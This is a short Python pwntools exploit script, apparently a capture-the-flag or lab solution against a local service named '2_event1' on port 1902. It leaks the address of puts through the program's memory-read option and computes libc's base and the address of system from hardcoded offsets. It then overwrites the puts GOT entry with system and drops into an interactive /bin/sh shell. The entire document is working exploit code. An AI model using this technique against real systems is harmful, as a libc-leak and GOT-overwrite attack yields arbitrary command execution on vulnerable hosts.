#!/usr/bin/python

from pwn import *
import time

offset___libc_start_main_ret = 0x18637
offset_system = 0x0003ada0
offset_dup2 = 0x000d6190
offset_read = 0x000d5980
offset_write = 0x000d59f0
offset_str_bin_sh = 0x15b82b
offset_puts = 0x0005fca0

puts_got = 0x804a020

def main():
    #p = process("../build/2_event1")
    p = remote("localhost", 1902)

    # Read until name prompt
    p.recvrepeat(0.2)

    # Send the binsh
    p.sendline("/bin/sh")
    p.recvrepeat(0.2)

    # Select option 1
    p.sendline("1")
    p.sendline(hex(puts_got))

    # Get leak
    data = p.recvrepeat(0.2)
    puts_addr = 0
    for i in data.split("\n"):
        if "Contents:" in i:
            puts_addr = int(i[i.find("Contents:")+10:], 16)
    log.info("puts_addr = 0x%x" % puts_addr)

    # Calculate
    libc_base = puts_addr - offset_puts
    system_addr = libc_base + offset_system

    #pwn
    p.sendline("3")
    p.sendline(hex(puts_got))
    p.sendline(hex(system_addr))
    p.recvrepeat(0.2)

    p.interactive()

if __name__ == "__main__":
    main()
